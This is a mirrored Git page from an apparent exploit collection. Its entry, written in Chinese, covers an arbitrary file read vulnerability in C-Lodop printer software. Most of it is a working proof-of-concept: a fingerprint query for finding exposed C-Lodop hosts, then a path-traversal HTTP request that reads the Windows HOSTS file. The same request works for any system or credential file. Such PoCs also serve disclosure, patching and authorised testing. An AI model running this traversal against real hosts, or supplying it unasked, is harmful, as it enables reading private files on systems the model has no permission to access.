admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/C-Lodop打印机任意文件读取漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

364 B
Raw Blame History

C-Lodop打印机任意文件读取漏洞

漏洞描述

C-Lodop打印机存在任意文件读取漏洞通过构造特殊URL可实现读取系统任意文件。

网络测绘

title="C-Lodop"

漏洞复现

poc

GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
Host: 127.0.0.1
....